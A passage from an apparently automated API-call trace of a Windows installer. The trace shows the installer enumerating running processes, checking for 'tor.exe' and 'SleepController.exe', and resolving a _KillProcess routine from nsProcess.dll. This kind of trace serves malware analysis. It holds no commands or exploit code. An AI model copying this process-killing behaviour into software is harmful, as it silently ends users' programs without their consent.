lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0261.544] lstrcmpiA (lpString1="spgagentservice.exe", lpString2="tor.exe") returned -1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0261.544] lstrcmpiA (lpString1="utg2.exe", lpString2="tor.exe") returned 1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="through recognize.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="through recognize.exe", lpUsedDefaultChar=0x0) returned 22 [0261.544] lstrcmpiA (lpString1="through recognize.exe", lpString2="tor.exe") returned -1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0261.544] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="tor.exe") returned 1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0261.544] lstrcmpiA (lpString1="audiodg.exe", lpString2="tor.exe") returned -1 [0261.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskeng.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskeng.exe", lpUsedDefaultChar=0x0) returned 12 [0261.545] lstrcmpiA (lpString1="taskeng.exe", lpString2="tor.exe") returned -1 [0261.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.545] lstrcmpiA (lpString1="dllhost.exe", lpString2="tor.exe") returned -1 [0261.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.545] lstrcmpiA (lpString1="dllhost.exe", lpString2="tor.exe") returned -1 [0261.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="88.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="88.exe", lpUsedDefaultChar=0x0) returned 7 [0261.545] lstrcmpiA (lpString1="88.exe", lpString2="tor.exe") returned -1 [0261.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="99.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="99.exe", lpUsedDefaultChar=0x0) returned 7 [0261.545] lstrcmpiA (lpString1="99.exe", lpString2="tor.exe") returned -1 [0261.546] LocalFree (hMem=0x2aadc8) returned 0x0 [0261.546] lstrcpynA (in: lpString1=0x27f71c, lpString2="603", iMaxLength=32 | out: lpString1="603") returned="603" [0261.546] MulDiv (nNumber=11, nNumerator=30000, nDenominator=60) returned 5500 [0261.546] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x157c, lParam=0x0) returned 0x1388 [0261.547] lstrcpynA (in: lpString1=0x432800, lpString2="603", iMaxLength=1024 | out: lpString1="603") returned="603" [0261.547] MulDiv (nNumber=12, nNumerator=30000, nDenominator=60) returned 6000 [0261.547] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x1770, lParam=0x0) returned 0x157c [0261.548] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.548] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.548] lstrcpynA (in: lpString1=0x40ac10, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.548] lstrcpynA (in: lpString1=0x40b010, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0261.549] lstrcmpiA (lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", lpString2="") returned 1 [0261.549] MulDiv (nNumber=13, nNumerator=30000, nDenominator=60) returned 6500 [0261.549] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x1964, lParam=0x0) returned 0x1770 [0261.549] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.550] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.550] lstrcpynA (in: lpString1=0x40b010, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" [0261.550] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" [0261.550] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsprocess.dll")) returned 0x2020 [0261.550] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsprocess.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0261.550] lstrcpynA (in: lpString1=0x42a048, lpString2="Skipped: ", iMaxLength=1024 | out: lpString1="Skipped: ") returned="Skipped: " [0261.551] lstrlenA (lpString="Skipped: ") returned 9 [0261.551] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned 62 [0261.551] lstrcatA (in: lpString1="Skipped: ", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" | out: lpString1="Skipped: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned="Skipped: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" [0261.551] MulDiv (nNumber=14, nNumerator=30000, nDenominator=60) returned 7000 [0261.551] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x1b58, lParam=0x0) returned 0x1964 [0261.551] MulDiv (nNumber=15, nNumerator=30000, nDenominator=60) returned 7500 [0261.551] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x1d4c, lParam=0x0) returned 0x1b58 [0261.552] lstrcpynA (in: lpString1=0x2aadcc, lpString2="SleepController.exe", iMaxLength=1024 | out: lpString1="SleepController.exe") returned="SleepController.exe" [0261.552] MulDiv (nNumber=16, nNumerator=30000, nDenominator=60) returned 8000 [0261.552] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x1f40, lParam=0x0) returned 0x1d4c [0261.552] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.552] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.552] lstrcpynA (in: lpString1=0x40a810, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll" [0261.553] lstrcpynA (in: lpString1=0x40a410, lpString2="_KillProcess", iMaxLength=1024 | out: lpString1="_KillProcess") returned="_KillProcess" [0261.553] GetModuleHandleA (lpModuleName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsProcess.dll") returned 0x10000000 [0261.553] GetProcAddress (hModule=0x10000000, lpProcName="_KillProcess") returned 0x1000143e [0261.553] lstrcpynA (in: lpString1=0x10003000, lpString2="SleepController.exe", iMaxLength=1024 | out: lpString1="SleepController.exe") returned="SleepController.exe" [0261.554] GetVersionExA (in: lpVersionInformation=0x2d6fccc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x40a410, dwMinorVersion=0x40a810, dwBuildNumber=0xffff, dwPlatformId=0x10000000, szCSDVersion="D ") | out: lpVersionInformation=0x2d6fccc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0261.554] LoadLibraryA (lpLibFileName="NTDLL.DLL") returned 0x779e0000 [0261.554] GetProcAddress (hModule=0x779e0000, lpProcName="NtQuerySystemInformation") returned 0x779ffda0 [0261.554] LocalAlloc (uFlags=0x0, uBytes=0x4000) returned 0x2aadc8 [0261.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2aadc8, Length=0x4000, ResultLength=0x2d6fd60 | out: SystemInformation=0x2aadc8, ResultLength=0x2d6fd60*=0x10388) returned 0xc0000004 [0261.555] LocalFree (hMem=0x2aadc8) returned 0x0 [0261.555] LocalAlloc (uFlags=0x0, uBytes=0x8000) returned 0x2aadc8 [0261.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2aadc8, Length=0x8000, ResultLength=0x2d6fd60 | out: SystemInformation=0x2aadc8, ResultLength=0x2d6fd60*=0x10388) returned 0xc0000004 [0261.556] LocalFree (hMem=0x2aadc8) returned 0x0 [0261.655] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x2aadc8 [0261.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2aadc8, Length=0x10000, ResultLength=0x2d6fd60 | out: SystemInformation=0x2aadc8, ResultLength=0x2d6fd60*=0xc9f0) returned 0x0 [0261.656] FreeLibrary (hLibModule=0x779e0000) returned 1 [0261.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0261.656] lstrcmpiA (lpString1="System", lpString2="SleepController.exe") returned 1 [0261.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0261.656] lstrcmpiA (lpString1="smss.exe", lpString2="SleepController.exe") returned 1 [0261.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0261.656] lstrcmpiA (lpString1="csrss.exe", lpString2="SleepController.exe") returned -1 [0261.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0261.656] lstrcmpiA (lpString1="wininit.exe", lpString2="SleepController.exe") returned 1 [0261.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0261.656] lstrcmpiA (lpString1="csrss.exe", lpString2="SleepController.exe") returned -1 [0261.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0261.656] lstrcmpiA (lpString1="winlogon.exe", lpString2="SleepController.exe") returned 1 [0261.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0261.656] lstrcmpiA (lpString1="services.exe", lpString2="SleepController.exe") returned -1 [0261.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0261.656] lstrcmpiA (lpString1="lsass.exe", lpString2="SleepController.exe") returned -1 [0261.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsm.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsm.exe", lpUsedDefaultChar=0x0) returned 8 [0261.656] lstrcmpiA (lpString1="lsm.exe", lpString2="SleepController.exe") returned -1 [0261.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.656] lstrcmpiA (lpString1="svchost.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.657] lstrcmpiA (lpString1="svchost.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.657] lstrcmpiA (lpString1="svchost.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.657] lstrcmpiA (lpString1="svchost.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.657] lstrcmpiA (lpString1="svchost.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.657] lstrcmpiA (lpString1="svchost.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0261.657] lstrcmpiA (lpString1="explorer.exe", lpString2="SleepController.exe") returned -1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0261.657] lstrcmpiA (lpString1="dwm.exe", lpString2="SleepController.exe") returned -1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.657] lstrcmpiA (lpString1="svchost.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0261.657] lstrcmpiA (lpString1="spoolsv.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhost.exe", lpUsedDefaultChar=0x0) returned 13 [0261.657] lstrcmpiA (lpString1="taskhost.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.657] lstrcmpiA (lpString1="svchost.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0261.657] lstrcmpiA (lpString1="OfficeClickToRun.exe", lpString2="SleepController.exe") returned -1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0261.657] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.657] lstrcmpiA (lpString1="svchost.exe", lpString2="SleepController.exe") returned 1 [0261.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0261.657] lstrcmpiA (lpString1="sppsvc.exe", lpString2="SleepController.exe") returned 1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iexplore.exe", lpUsedDefaultChar=0x0) returned 13 [0261.658] lstrcmpiA (lpString1="iexplore.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="iexplore.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iexplore.exe", lpUsedDefaultChar=0x0) returned 13 [0261.658] lstrcmpiA (lpString1="iexplore.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sufferexistrich.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sufferexistrich.exe", lpUsedDefaultChar=0x0) returned 20 [0261.658] lstrcmpiA (lpString1="sufferexistrich.exe", lpString2="SleepController.exe") returned 1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="have return physical.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="have return physical.exe", lpUsedDefaultChar=0x0) returned 25 [0261.658] lstrcmpiA (lpString1="have return physical.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="or level.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="or level.exe", lpUsedDefaultChar=0x0) returned 13 [0261.658] lstrcmpiA (lpString1="or level.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="court camera.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="court camera.exe", lpUsedDefaultChar=0x0) returned 17 [0261.658] lstrcmpiA (lpString1="court camera.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="or-finger.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="or-finger.exe", lpUsedDefaultChar=0x0) returned 14 [0261.658] lstrcmpiA (lpString1="or-finger.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="travel imagine recently.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="travel imagine recently.exe", lpUsedDefaultChar=0x0) returned 28 [0261.658] lstrcmpiA (lpString1="travel imagine recently.exe", lpString2="SleepController.exe") returned 1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="school_for.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="school_for.exe", lpUsedDefaultChar=0x0) returned 15 [0261.658] lstrcmpiA (lpString1="school_for.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="whosefirmthe.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whosefirmthe.exe", lpUsedDefaultChar=0x0) returned 17 [0261.658] lstrcmpiA (lpString1="whosefirmthe.exe", lpString2="SleepController.exe") returned 1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="seat_raise_join.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="seat_raise_join.exe", lpUsedDefaultChar=0x0) returned 20 [0261.658] lstrcmpiA (lpString1="seat_raise_join.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="formerbuildpresent.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="formerbuildpresent.exe", lpUsedDefaultChar=0x0) returned 23 [0261.658] lstrcmpiA (lpString1="formerbuildpresent.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="unittype.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unittype.exe", lpUsedDefaultChar=0x0) returned 13 [0261.658] lstrcmpiA (lpString1="unittype.exe", lpString2="SleepController.exe") returned 1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="allow.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="allow.exe", lpUsedDefaultChar=0x0) returned 10 [0261.658] lstrcmpiA (lpString1="allow.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="rate.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rate.exe", lpUsedDefaultChar=0x0) returned 9 [0261.658] lstrcmpiA (lpString1="rate.exe", lpString2="SleepController.exe") returned -1 [0261.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pushweight.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pushweight.exe", lpUsedDefaultChar=0x0) returned 15 